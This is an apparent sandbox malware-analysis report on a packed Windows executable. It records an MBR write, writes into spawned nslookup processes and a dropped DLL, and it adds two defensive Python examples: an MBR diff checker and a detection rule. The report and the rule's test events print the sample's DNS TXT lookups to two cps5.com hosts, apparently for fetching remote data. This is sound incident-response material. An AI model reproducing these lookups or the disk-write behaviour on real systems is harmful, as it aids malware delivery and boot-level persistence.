Analysis
  max time kernel: 141s
  max time network: 138s
  platform: windows10-2004_x64
  resource: win10v2004-20240611-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 15-06-2024 02:41
Behavioral task behavioral1
  Sample: f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
  Resource: win7-20240220-en
Behavioral task behavioral2
  Sample: f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
  Resource: win10v2004-20240611-en
Every signature, process and memory dump on this page is prefixed behavioral2, i.e. it comes from the win10v2004-20240611-en run; no results from behavioral1 (win7) are shown here.
General
  Target: f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
  Size: 10.4MB
  MD5: 806b4399e2524e0c38ea076a4f5c4154
  SHA1: 0e133677799df2506404dc4b6e992179bdbe9f3f
  SHA256: f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f
  SHA512: 1d60fc9940e96efb0d8a1c8bede83842872fb981f4c3b8c7b74c38ca18c9ada92ea8262967128c951c1543a11f585244c6d45bc41ef8292a015036d651b8bc0b
  SSDEEP: 196608:KaUo1YyjJpXQlXZMJ0MowNZYx4S0BVoKLBFSlMDqAu7/1f6b+QFH2m5Yn10Cd:Kto1YaXQlXZw0M3zYy1oKDSlMLu7Ne/Q
Malware Config
Signatures
UPX dump on OEP (original entry point)   31 IoCs
Processes (resource / yara_rule): 31 memory dumps of pid 4956, all matching rule UPX, covering two address ranges:
  behavioral2/memory/4956-<n>-0x0000000000400000-0x000000000104B000-memory.dmp   UPX   (n = 0, 60, 68)
  behavioral2/memory/4956-<n>-0x0000000010000000-0x000000001003E000-memory.dmp   UPX   (n = 6, 8, 9, 10, 11, 13, 15, 18, 20, 21, 23, 25, 27, 29, 31, 33, 35, 37, 40, 41, 43, 45, 47, 49, 51, 52, 53, 54)
The 31 hits are repeated dumps of the same two regions, not 31 distinct artifacts. 0x00400000 is the default image base of a 32-bit executable and 0x10000000 the default base of a 32-bit DLL built with the Microsoft linker; the report does not say which module occupies the second range.
Loads dropped DLL   1 IoC
Processes (pid / process):
  4956   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
Untitled signature (title not captured in this export), YARA rule upx   31 IoCs
Processes (resource / yara_rule): the same 31 dumps of pid 4956, this time matched by the lowercase rule upx:
  behavioral2/memory/4956-<n>-0x0000000000400000-0x000000000104B000-memory.dmp   upx   (n = 0, 60, 68)
  behavioral2/memory/4956-<n>-0x0000000010000000-0x000000001003E000-memory.dmp   upx   (n = 6, 8, 9, 10, 11, 13, 15, 18, 20, 21, 23, 25, 27, 29, 31, 33, 35, 37, 40, 41, 43, 45, 47, 49, 51, 52, 53, 54)
Writes to the Master Boot Record (MBR)   1 TTP, 1 IoC
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes (description / ioc / process):
  File opened for modification   \??\PhysicalDrive0   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
The IoC records a write-access open of \??\PhysicalDrive0, the raw first disk, not the bytes that were written. Partitioning and imaging tools open the disk the same way, so before calling this a bootkit, read sector 0 from the affected host and compare it with a known-good copy.
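The check a responder wants after this IoC is to pull sector 0 and diff it against a baseline. The Python below is an added example, not tooling from the sandbox or from the sample's authors: it parses a 512-byte MBR in the Windows layout (440 bytes of boot code, 4-byte disk signature at 0x1B8, four 16-byte partition entries at 0x1BE, 0x55AA at 0x1FE), hashes the boot code and reports what differs. BASELINE and TAMPERED are constructed sectors for the demo; read_physical_drive0() shows the real read, which needs Windows and administrative rights and is not called by default.

```python
"""Compare a disk's first sector (MBR) against a known-good copy.

Added example for the "Writes to the Master Boot Record" IoC; the sector
contents below are constructed, not taken from the analysed sample.
"""
import hashlib
import struct

SECTOR = 512
BOOT_CODE_LEN = 440      # bytes 0..439: bootstrap code (Windows layout)
DISK_SIG_OFF = 440       # 4-byte NT disk signature
PART_TABLE_OFF = 446     # 4 x 16-byte partition entries
BOOT_SIG_OFF = 510       # 0x55 0xAA
# One partition entry: status, CHS start (3, skipped), type, CHS end (3, skipped),
# LBA start, sector count; all little-endian.
PART_FMT = "<B3xB3xII"


def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte sector into boot-code digest, disk signature and partitions."""
    if len(sector) != SECTOR:
        raise ValueError(f"expected {SECTOR} bytes, got {len(sector)}")
    if sector[BOOT_SIG_OFF:] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        status, ptype, lba_start, sectors = struct.unpack_from(PART_FMT, sector, PART_TABLE_OFF + 16 * i)
        if ptype == 0:
            continue  # empty slot
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, DISK_SIG_OFF)[0],
        "partitions": partitions,
    }


def diff_mbr(baseline: bytes, current: bytes) -> list:
    """Return human-readable findings where `current` departs from `baseline`."""
    base, cur = parse_mbr(baseline), parse_mbr(current)
    findings = []
    if base["boot_code_sha256"] != cur["boot_code_sha256"]:
        changed = [i for i in range(BOOT_CODE_LEN) if baseline[i] != current[i]]
        findings.append(f"boot code modified: {len(changed)} byte(s), first at offset {changed[0]}")
    if base["disk_signature"] != cur["disk_signature"]:
        findings.append("disk signature changed")
    if base["partitions"] != cur["partitions"]:
        findings.append("partition table changed")
    return findings


def build_demo_sector(boot_code: bytes) -> bytes:
    """Constructed MBR with one bootable NTFS (type 0x07) partition at LBA 2048."""
    sector = bytearray(SECTOR)
    sector[:len(boot_code)] = boot_code
    struct.pack_into("<I", sector, DISK_SIG_OFF, 0x1234ABCD)            # arbitrary demo signature
    struct.pack_into(PART_FMT, sector, PART_TABLE_OFF, 0x80, 0x07, 2048, 204800)
    sector[BOOT_SIG_OFF:] = b"\x55\xAA"
    return bytes(sector)


# Stand-in for the stock boot code: a short jump followed by padding (constructed).
BASELINE = build_demo_sector(b"\xEB\x3C\x90" + b"\x90" * 100)
# Tampered copy: the jump target at offset 1 is redirected, as a bootkit hook would.
_t = bytearray(BASELINE)
_t[1] = 0x20
TAMPERED = bytes(_t)


def read_physical_drive0() -> bytes:
    """Real read of sector 0. Windows only, needs administrator rights; not called here."""
    with open(r"\\.\PhysicalDrive0", "rb") as disk:
        return disk.read(SECTOR)


if __name__ == "__main__":
    for finding in diff_mbr(BASELINE, TAMPERED):
        print(finding)
```

On a live host, capture the baseline from a clean reference image of the same build and compare it with the output of read_physical_drive0() run from an elevated prompt; a change confined to the partition table is usually administrative, a change in the 440 bytes of boot code on a system that was not reinstalled is what the signature is warning about.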
Enumerates physical storage devices   1 TTP
Attempts to interact with connected storage/optical drive(s).
Suspicious use of FindShellTrayWindow   1 IoC
Processes (pid / process):
  4956   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe

Suspicious use of SendNotifyMessage   1 IoC
Processes (pid / process):
  4956   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe

Suspicious use of SetWindowsHookEx   5 IoCs
Processes (pid / process):
  4956   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe   (5 events)
Suspicious use of WriteProcessMemory   6 IoCs
Processes (description / pid / process / target pid / target process):
  wrote to memory of   4956   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe   5048   nslookup.exe   (3 events)
  wrote to memory of   4956   f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe   4452   nslookup.exe   (3 events)
Both targets are the nslookup.exe children shown in the process tree; a parent writing into a process it has just created is also what an ordinary CreateProcess looks like to the monitor, so these events corroborate the spawn rather than prove injection into an unrelated process.
Processes
depth 1: C:\Users\Admin\AppData\Local\Temp\f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe"
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  depth 2: C:\Windows\SysWOW64\nslookup.exe
    command line: nslookup -qt=TXT dlf.cps5.com
  depth 2: C:\Windows\SysWOW64\nslookup.exe
    command line: nslookup -qt=TXT dlwebf.cps5.com
depth 1: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4192,i,2029050989380753659,15333598055019363793,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:8
The two nslookup children (pids 5048 and 4452 in the WriteProcessMemory IoCs) each issue a single DNS TXT query for a host under cps5.com; the SysWOW64 copy is used because the sample is a 32-bit process and WOW64 file-system redirection resolves nslookup.exe to it. The msedge.exe utility process is a separate depth-1 entry, not a child of the sample.
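The process tree above is the pattern a detection should key on: a binary in a user-writable directory spawning nslookup.exe with a TXT query type. The Python below is an added example, not tooling from the sandbox or from the sample's authors: it runs that rule over process-creation events. The sample, pids 4956/5048/4452 and the two nslookup command lines are taken from this report; the parent pid 1000, the cmd.exe pid 7000/7001 events and the _dmarc.example.com lookup are constructed as a benign contrast.

```python
"""Flag nslookup.exe spawned by a parent running from a user-writable path.

Added example for the process tree in this report. EVENTS is constructed:
the sample and its two nslookup children mirror the report, the cmd.exe
lookup is invented to show a query that must not fire.
"""
import re

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe")

EVENTS = [
    {"pid": 4956, "ppid": 1000, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 5048, "ppid": 4956, "image": r"C:\Windows\SysWOW64\nslookup.exe",
     "cmdline": "nslookup -qt=TXT dlf.cps5.com"},
    {"pid": 4452, "ppid": 4956, "image": r"C:\Windows\SysWOW64\nslookup.exe",
     "cmdline": "nslookup -qt=TXT dlwebf.cps5.com"},
    # Constructed benign activity: an admin checking a DMARC record from cmd.exe.
    {"pid": 7000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 7001, "ppid": 7000, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -type=TXT _dmarc.example.com 8.8.8.8"},
]

# Directories an unprivileged user can write to; a parent living there is itself suspect.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(?:users\\[^\\]+\\appdata\\|users\\public\\|programdata\\|windows\\temp\\)", re.I)
# nslookup accepts -q, -qt, -query, -querytype and -type for the record type, any case.
QTYPE_OPT = re.compile(r"^-(?:q|qt|query|querytype|type)=(\w+)$", re.I)


def parse_nslookup(cmdline: str):
    """Return (query_type, name, server) from an nslookup command line; type defaults to A."""
    qtype, positional = "A", []
    for arg in cmdline.split()[1:]:
        m = QTYPE_OPT.match(arg)
        if m:
            qtype = m.group(1).upper()
        elif arg.startswith("-"):
            continue                    # other options (-timeout=, -vc, ...) do not matter here
        else:
            positional.append(arg)      # first is the name, optional second is the server
    name = positional[0] if positional else None
    server = positional[1] if len(positional) > 1 else None
    return qtype, name, server


def detect(events):
    """One finding per nslookup child whose parent image lives in a user-writable path."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not e["image"].lower().endswith(r"\nslookup.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or not USER_WRITABLE.match(parent["image"]):
            continue
        qtype, name, server = parse_nslookup(e["cmdline"])
        findings.append({
            "rule": "nslookup spawned from user-writable path",
            # TXT answers can carry arbitrary text, so a TXT query from such a
            # parent is rated above an ordinary name resolution.
            "severity": "high" if qtype == "TXT" else "medium",
            "parent_pid": parent["pid"], "pid": e["pid"],
            "qtype": qtype, "domain": name, "server": server,
        })
    return findings


def queried_domains(findings):
    """Distinct names from the findings, ready for a DNS block or alert list."""
    return sorted({f["domain"] for f in findings if f["domain"]})


if __name__ == "__main__":
    hits = detect(EVENTS)
    for hit in hits:
        print(hit)
    print(queried_domains(hits))
```

Feed it Sysmon Event ID 1 or EDR process-creation records with the same four fields; the parent path test is what keeps the rule quiet for administrators running nslookup from a shell, while the sample's own temp-directory path is what makes both of its lookups fire.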
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Temp\E2EECore.3.3.9.dll
  Filesize: 10.6MB
  MD5: 50c266e46ccf9bc8956279f78d51f205
  SHA1: 0ba5b98a91a9a019cd9b87cf01796c65ee6a0839
  SHA256: c58e066a293ff260037487d37e37bf3d890c16383d817c7573dab51c514cbd00
  SHA512: 7350a82820faeba3172fad3d87b04c6a2967b797a321a78a53e7156c37fed4661a66d2f78e2f3ddbcbc0d10a56f5d761f7eb761f05d2841568b34841c17e0d37
Memory dumps of pid 4956 (33 files, three address ranges):
  memory/4956-<n>-0x0000000010000000-0x000000001003E000-memory.dmp   Filesize: 248KB    (n = 6, 8, 9, 10, 11, 13, 15, 18, 20, 21, 23, 25, 27, 29, 31, 33, 35, 37, 40, 41, 43, 45, 47, 49, 51, 52, 53, 54)
  memory/4956-<n>-0x0000000000400000-0x000000000104B000-memory.dmp   Filesize: 12.3MB   (n = 0, 60, 68)
  memory/4956-<n>-0x0000000076FC3000-0x0000000076FC4000-memory.dmp   Filesize: 4KB      (n = 55, 62)